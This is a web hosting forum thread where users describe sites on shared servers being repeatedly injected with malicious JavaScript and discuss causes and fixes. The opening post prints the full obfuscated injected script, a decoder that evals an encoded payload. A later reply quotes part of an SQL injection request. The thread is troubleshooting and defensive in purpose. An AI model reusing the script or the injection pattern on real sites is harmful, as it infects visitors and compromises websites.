Do any one face with the virus on the server unix28 ?

[quangmd]

Hi everybody,

I have a plan on the server unix28, and all the page are infected. although I had fix all, reset all the password, check all the source, even delete it all. I got it infected too. But also I have some track in the page, and it shows that it doesnt cause by the source code cause it haev nothing inside, just a simeple page index.html.

always after sometime, I got the page insearted with a malscript:

<script language=JavaScript> function qibbn15(p) { var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,22, 12,11,31,60,26,0,1,53,0,0,0,0,0,0,52,46,47,55,49,2 7,37,21,8,38,3,15,32,61,56,25,2,13,39,36,35,34,58, 28,14,62,20,0,0,0,0,40,0,54,30,7,6,5,51,16,19,43,3 3,17,48,50,9,23,41,59,10,18,29,24,57,4,45,44,42);f or(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(231^j&255);j>>=8 ;d-=2}else{d=6}}}eval(c);}}qibbn15('gVuUJUHSnhvSdXpSZ zQlTUuUPP2CJUHjsz_LnXOmg1pThrNf7BxT81pjrrNDn6_UPzx CedxCPdNDZ1nj6o5ThXvFtT2mdXNLroNUHsHTr4vUssOmnrNSH KnmuJ2fz6NSKIWFHrOUJYyzdXvTnopjnXHUrYyfQoM@G4M9Xf2 lbou@b3uL7f2le42SXXNSKzt9G4MDKr_T7YNS6Ex9o42FhVvUP ztDJVHFoA_jbatUHI_LeRMaHquLG6_UPIQlXJ') </script>

even just only a very simple html page.

Did anyone face with it too ?

I was in so bad situation now.

is there anything that vortech can help ??? I ask for support but got nothing but do it your self -> I deleted it all and still being infected. damn, what can I do now ?

Hic hic

[canada]

I am having a same problem here. It looks like some kind of script that is sitting on the server and every after a few minutes it adds a strange javascript at the end or middle of every index.html or index.php file so when the user access this index file in the web browser then it tries to redirect user to an ADWARE site.

At the same time if someone has antivirus on the PC he cannot view this website because antivius blocks this index page.

This is a very critical problem and we are facing this since a few months now.

If someone has any suggeston please advise.

Temporary we have created a solution to this problem and have created a php file that scans all the files in the directory and remvoe that javascript virus but this is not a solid solution becuase next day the virus program again adds this virus into index file.

I appreciate if the server administrator look into this problem without delay.

thanks

[quangmd]

Yes, I had place a ticket but receiving nothing much

[canada]

Toi cung gap van de tuong tu nhu vay, ban co the lien lac voi toi qua dia chi ambianz @ gmail.com

[kattouf]

I've seen that problem several times. Changing all the passwords seemed to help.

[dpyers]

Every instance of page defacement I've ever heard of has always been caused by user credentials being compromised or bad application code - never by a server virus.

Places I'd start looking are; anything that allows a user to upload; forms that can accept html; forum software; blog software; flash movies; and then any other software apps I have running.

Googling for what is displayed on the page will usually point me to a solution.

[prakash]

I have same problem in Unix 17. When I submitted ticket, I got the below reply.

See the first reply.
Hello,

Your site's security was compromised.

This is done through insecure coding you install into the site. We allow you to install your own coding and software, it is isolated to your user environment. It would be impossible for us to protect you from yourself. With the freedom to write and install your own choices of coding comes the responsibility of making sure it is secure. Our servers are set up in a way which makes it impossible for cross account breeches or server wide compromises. Any security compromise is caused by your software, and is hence limited to the resources of your account.

The warning messages you are getting are not necessarily files loaded from the server. People add in, or "inject" bits of code that causes your browser to attempt to fetch the trojan/downloader/viral files from another location. In some rare cases the file is stored encoded or possibly encoded and segmented (where it is not an active threat which would be caught by virus scanning) on the server and the web page coding they inject assembles the files. That is rare, typically the downloaded file comes from elsewhere only the java script that fetches the file is injected into your coding. I would suggest checking the modification dates of your software, and your transaction logs to see when these modifications were made, then removing and replacing all files made after that date. You should also make sure all scripts you use are properly hardened against such injection techniques and all third party software you run is properly updated and patched for it's vulnerabilities.
Best Regards,

We fixed it, By deleting and from the server. Checked everything. Uploaded AGain. It worked for few days. Again started giving Virus problem. When We submitted Ticket, See the second reply.

Hello,

The site was compromised, likely through some form of JS injection, sql injection, or coding weakness. You will have to FTP into the site and clean or restore the files back to what they should be, then report it to google that you have fixed the security compromise which leads visitors to an attack page.


Best Regards,

We have a tried uploading in other than VT server, it works perfectly.

[kattouf]

There might be a worm or virus on your pc that captures the ftp detail. I doubt there is a virus on the web server.

[dpyers]

Agree. Far larger chance that it's either coming from your pc or from web software you have that may have a vulnerability. - e.g. some versions of forum and blog software allows users to put javascript in posts which winds up infecting the whole site. To reinstall the defacement, all they need to do is post again.

[quangmd]

actually, the site that having the virus did not have any code, only one html index file, changing all password (cpanel, ftp,..) doesnt solved! then I leave it alone, virus - you do what you want on that server (

[DigitalSkyline]

You sure you don't have a virus on your local machine?

I've had hack attempts on my site and traced them back to a virus/malware that masquerades as a legitimate IE toolbar. Basically it attempts to install itself to every website the user visits using SQL injection. If successful it puts a javascript in your database that redirects to the malware source and the cycle continues.

I had requests that looked like : /CMS.asp;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAS T (HUGE DATA HERE)
read more here: http://www.modsecurity.org/blog/arch...jection_a.html

They failed to hack my system... but it was interesting.

If this is not the case... and the server is really rooted... then... what can I say but... wow.